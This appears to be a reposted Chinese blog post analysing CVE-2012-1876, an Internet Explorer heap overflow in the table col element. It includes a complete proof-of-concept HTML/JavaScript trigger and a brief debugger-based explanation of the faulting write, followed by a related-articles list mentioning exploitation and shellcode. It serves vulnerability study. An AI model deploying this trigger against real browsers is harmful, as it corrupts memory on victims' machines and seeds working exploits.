CVE-2012-1876漏洞分析

最新推荐文章于 2020-12-08 03:55:22 发布
最新推荐文章于 2020-12-08 03:55:22 发布
阅读量157 收藏
点赞数
原文链接:http://www.cnblogs.com/Ox9A82/p/5311296.html
版权

0.POC文件

 1 <html>
 2  <body>
 3  <table style="table-layout:fixed" >
 4         <col id="132" width="41" span="1" >&nbsp </col>
 5  </table>
 6  <script>
 7 
 8  function over_trigger() {
 9         var obj_col = document.getElementById("132");
10         obj_col.width = "42765";
11         obj_col.span = 1000;
12  }
13 
14  setTimeout("over_trigger();",10);
15 
16  </script>
17  </body>
18  </html>

 

1.漏洞复现

环境如下

2.漏洞分析

打开POC文件即发生异常,挂载调试器。异常情况如图

注意0x9A99000位置内存不可写入导致异常,图示是增加了写权限后的内存示意图。

分析可知,是堆溢出超出堆边界导致尝试写入不可写入的内存地址而引发了异常。

异常语句如图

edi的值为0x9A99000

mov [0x9A99000],ecx

引发异常

转载于:https://www.cnblogs.com/Ox9A82/p/5311296.html

weixin_30622107
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cve-2012-1876漏洞分析
小强的博客
11-15 1599
关于调试其他文章有,就不重点介绍了,主要介绍一下漏洞原理,汇编代码,以及漏洞的利用过程。 poc.html:   function over_trigger() { var obj_col = document.getElementById("132"); obj_col.width = "42765";
CVE-2012-0158漏洞分析
weixin_44279850的博客
12-27 1440
1样本概况 1.1样本信息 漏洞编号:CVE-2012-0158 漏洞模块:MSCOMCTL.OCX 漏洞类型:缓冲区溢出 样本MD5: 15552F40076D67AF066391D03AC173ED 样本SHA1: 4E8EAD45BDE2CF343DED6B02F13B893D57E1383E 样本CRC32: 51F953DF 1.2漏洞分析环境与工具 操作系统:Window 7 专业版 ...
CVE_2012_1876堆溢出分析
weixin_30520015的博客
09-19 262
  首先用windbg附加进程ie页面内容进程,!gflag +hpa添加堆尾检查,.childdbg 1允许子进程调试,然后加载POC。 POC: <html> <body> <table style="table-layout:fixed" > <col id="132" width="41" span="1" &gt...
CVE-2012-1876:Internet Exporter MSHTML.DLL CaculateMinMax 堆溢出简单分析
墨鱼菜鸡
03-08 153
0x01 2012 Pwn2Own 黑客大赛 Pwn2Own 是世界上最著名的黑客大赛,意在激励白帽黑客们进行顶尖的安全研究。在 ...
CVE-2012-1876Microsoft Internet Explorer Col元素远程代码执行漏洞分析
weixin_30325793的博客
07-29 476
    Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 Microsoft Internet Explorer 6至9版本中存在漏洞,该漏洞源于未正确处理内存中的对象。远程攻击者可利用该漏洞通过试图访问不存在的对象执行任意代码。也称“Col元素远程代码执行漏洞”。 <html> <body&...
CVE-2012-4969漏洞分析
02-29
CVE-2012-4969漏洞分析,详细的分析了该漏洞的造成原因!
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2012-1876-x86-x64 EXP分析调试1
08-03
CVE-2012-1876 是一个影响Microsoft Windows和Internet Explorer 9的提权漏洞,该漏洞2012年的Pwn2Own黑客大赛上被法国安全团队Vupen利用,展示了其强大的攻击能力。在赛事结束后,Vupen向微软报告了堆溢出漏洞,...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2012-1876 Internet Exporter堆溢出漏洞分析
鬼手的博客
08-16 1898
文章目录漏洞描述IE浏览器组件介绍分析环境POC漏洞分析漏洞利用参考资料 漏洞描述 该IE浏览器漏洞的成因在mshtml.dll这个模块的CTableLayout::CalculateMinMax函数里,程序在执行时会以HTML代码中的元素span属性作为循环控制次数向堆中写入数据。如果此span值设置不当,那么就会引发堆溢出问题。 IE浏览器组件介绍 Internet Explorer体系结构的...
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3732
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
js settimeout内存溢出_漏洞分析复现 | cve20121876 IE浏览器堆溢出漏洞
weixin_34774527的博客
12-08 528
漏洞原理与利用概述该漏洞是IE的mshtml模块的堆溢出漏洞。产生漏洞的原因是CalculateMinMax函数会根据HTML中的col标签的span属性值每次向堆中写入0x1c个字节的值。当我们用JS动态更改span的属性值时会再次调用CalculateMinMax函数,写入新的span * 0x1c个字节,问题在于这一次写入并没有开辟新的空间,而是在原先的位置和大小开始写入值(样式信...
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1494
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882的漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
CVE-2012-1876调试要点
weixin_33830216的博客
08-05 218
2019独角兽企业重金招聘Python工程师标准>>> ...
第一次漏洞分析(暴雷漏洞CVE-2012-1889)
九层台
11-30 1233
作为第一次分析,从萌新的角度分析一下漏洞。 环境 windows xp sp3 ie 6 漏洞出现模块msxml3.dll 那么老xp版本还没有pie直接找这个地址就行,美滋滋。系统好像是延迟绑定的,在刚开始的时候这个模块并没有加载,让程序运行结束在ctl+g就能找到这个地址了。 触发脚本 &lt;html&gt; &lt;head&gt; &lt;title&gt;CVE 2012-...
cve-2012-1876 win7_ie8_leak_shellcode code
爱杀之爪的矩阵
08-08 2917
alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0
算机科学与技术 基于Java的医务室病例管理小程序的设计与实现.docx
最新发布
07-20
算机科学与技术 基于Java的医务室病例管理小程序的设计与实现
CVE-2012-1876 Win7 IE9 堆溢出漏洞 EXP详解与x64平台分析
本文主要探讨的是CVE-2012-1876漏洞,这是一个针对Microsoft Windows系统,尤其是Windows 7中的IE9浏览器的0day(零日)漏洞。在2012年的Pwn2Own黑客大赛中,安全团队Vupen成功利用这两个漏洞,其中一个是涉及堆溢出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值